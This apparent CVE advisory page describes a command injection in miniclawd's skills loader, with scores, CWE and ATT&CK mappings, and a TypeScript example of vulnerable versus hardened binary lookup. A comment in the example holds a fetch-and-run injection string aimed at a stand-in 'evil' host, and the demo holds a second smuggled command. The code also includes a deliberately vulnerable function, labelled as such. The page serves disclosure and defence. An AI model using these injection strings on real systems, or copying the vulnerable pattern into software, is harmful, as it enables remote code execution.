Cyber Resilience

CVE-2026-9453

Medium

Published: 25 May 2026
Modified: 26 May 2026
KEV Added: not listed
Patch: none recorded
CVSS v4 score: 5.5 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)
EPSS score: 0.0155 (71.8th percentile)
Risk Priority: 12 (weighting: 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2026-9453 is a medium-severity injection vulnerability (CWE-74, with CWE-77 command injection also cited) in FoundDream miniclawd. Its CVSS v4 base score is 5.5 (Medium).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS score sits at the 71.8th percentile, i.e. in the top 28.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

A vulnerability has been identified in FoundDream miniclawd up to commit 2d65665046e2222eeea76cafc8570ed546a8c125, in the SkillsLoader component in the file /src/application/skills-loader.ts. The affected code path is the function named which, which handles the binaries a skill lists in its requires.bins entry; manipulation of that requires.bins argument allows command injection, classified under CWE-74 and CWE-77. The product follows a rolling release model, so no discrete version numbers are available for affected or patched builds. The issue was reported to the maintainers through a GitHub issue but had received no response at the time of writing.

The flaw is exploitable over the network by an unauthenticated attacker who can place crafted input in the requires.bins argument, resulting in execution of arbitrary commands. Public exploit code is already available. The CVSS 4.0 vector reflects a network attack vector, low attack complexity and no required privileges or user interaction (AV:N/AC:L/PR:N/UI:N), low impact on confidentiality, integrity and availability (VC:L/VI:L/VA:L), and proof-of-concept exploit maturity (E:P), which is why the score lands at 5.5 rather than higher.

Reference materials point to the project repository and the associated GitHub issue, but contain no details on patches or workarounds. The EPSS score has stayed essentially flat since disclosure, with no material increase observed.
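To make the weakness concrete, here is an added example (my own illustration, not miniclawd's code; the manifest shape, the function names and the PATH-walking resolver are assumptions) showing the pattern CWE-77 describes, a binary name spliced into a shell command line, beside a hardened resolver that allow-lists the name and never hands it to a shell:

```typescript
import { execSync, execFileSync } from "node:child_process";
import * as fs from "node:fs";
import * as os from "node:os";
import * as path from "node:path";

// Assumed shape of the requirement block a skill declares (hypothetical; the
// real manifest format of miniclawd is not shown on the page).
export interface SkillRequires {
  bins?: string[];
}

// VULNERABLE PATTERN (illustrative): the binary name is spliced into a shell
// command line. A value such as "git; curl http://evil/x | sh" is parsed by
// /bin/sh, so everything after ";" runs as an extra command.
export function vulnerableWhichCommandLine(bin: string): string {
  return `which ${bin}`;
}

export function vulnerableWhich(bin: string): string | null {
  try {
    return execSync(vulnerableWhichCommandLine(bin), { encoding: "utf8" }).trim();
  } catch {
    return null;
  }
}

// Hardened, step 1: allow-list the name. A binary requirement is a bare
// program name: never a path, never anything with shell metacharacters.
const BIN_NAME = /^[A-Za-z0-9][A-Za-z0-9._+-]{0,63}$/;

export function isSafeBinName(bin: string): boolean {
  return BIN_NAME.test(bin);
}

// Hardened, step 2: resolve the name without a shell. Walking PATH with fs
// needs no subprocess at all; the value is only ever used as a path segment.
export function resolveBinary(bin: string, pathEnv: string = process.env.PATH ?? ""): string | null {
  if (!isSafeBinName(bin)) {
    throw new Error(`rejected binary name: ${JSON.stringify(bin)}`);
  }
  for (const dir of pathEnv.split(path.delimiter).filter(Boolean)) {
    const candidate = path.join(dir, bin);
    try {
      fs.accessSync(candidate, fs.constants.X_OK);
      if (fs.statSync(candidate).isFile()) return candidate;
    } catch {
      // not present or not executable in this directory
    }
  }
  return null;
}

// If a subprocess is wanted anyway, execFile with an argv array never invokes
// a shell, so metacharacters in `bin` reach which(1) as one literal argument.
export function whichNoShell(bin: string): string | null {
  if (!isSafeBinName(bin)) return null;
  try {
    return execFileSync("which", [bin], { encoding: "utf8" }).trim();
  } catch {
    return null;
  }
}

export interface BinCheck {
  found: Record<string, string>;
  missing: string[];
  rejected: string[];
}

// Loader-side check: reject bad names up front and report the rest, instead
// of letting one hostile entry abort or hijack the whole load.
export function checkRequiredBins(requires: SkillRequires, pathEnv?: string): BinCheck {
  const result: BinCheck = { found: {}, missing: [], rejected: [] };
  for (const bin of requires.bins ?? []) {
    if (!isSafeBinName(bin)) {
      result.rejected.push(bin);
      continue;
    }
    const resolved = resolveBinary(bin, pathEnv);
    if (resolved) result.found[bin] = resolved;
    else result.missing.push(bin);
  }
  return result;
}

// Constructed demo: a temporary PATH holding one fake executable, and a
// manifest mixing a valid name, a missing one and an injection attempt.
export function demo(): BinCheck {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), "miniclawd-demo-"));
  fs.writeFileSync(path.join(dir, "git"), "#!/bin/sh\nexit 0\n", { mode: 0o755 });
  const manifest: SkillRequires = { bins: ["git", "ffmpeg", "git; id > /tmp/pwned"] };
  return checkRequiredBins(manifest, dir);
}
```

The allow-list regex is the cheap part of the fix and doubles as a detection rule: any requires.bins value that fails it is an injection attempt or a malformed manifest, and either is worth logging. Since the maintainers had not responded at the time of writing, a deployment that cannot patch can still validate skill manifests with a check like this before the loader sees them.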

Vulnerability details

A vulnerability was detected in FoundDream miniclawd up to 2d65665046e2222eeea76cafc8570ed546a8c125. This affects the function named which in the file /src/application/skills-loader.ts of the component SkillsLoader. Performing a manipulation of the argument requires.bins results in command injection. The attack may be initiated remotely. The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.

CWE(s)

CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-derived mapping)

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059 Command and Scripting Interpreter Execution
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries.
Why these techniques?

Remote command injection in a public-facing application component directly enables T1190 exploitation and arbitrary OS command execution via T1059.

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-0328 (shared CWE-74, CWE-77)
CVE-2025-1845 (shared CWE-74, CWE-77)
CVE-2026-1687 (shared CWE-74, CWE-77)
CVE-2025-10962 (shared CWE-74, CWE-77)
CVE-2026-8344 (shared CWE-74, CWE-77)
CVE-2026-1066 (shared CWE-74, CWE-77)
CVE-2025-15132 (shared CWE-74, CWE-77)
CVE-2026-3066 (shared CWE-74, CWE-77)
CVE-2025-1947 (shared CWE-74, CWE-77)
CVE-2025-15133 (shared CWE-74, CWE-77)

Mitigating Controls

Likely Mitigating Controls (AI-derived mapping)

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

Addresses CWE-74: Developer assessments and testing (including injection-focused techniques) identify improper neutralization of special elements, and verifiable flaw remediation corrects them before deployment.

Addresses CWE-74: Indicators of injection attacks (command, SQL, LDAP, etc.) are identified through anomaly and attack monitoring.
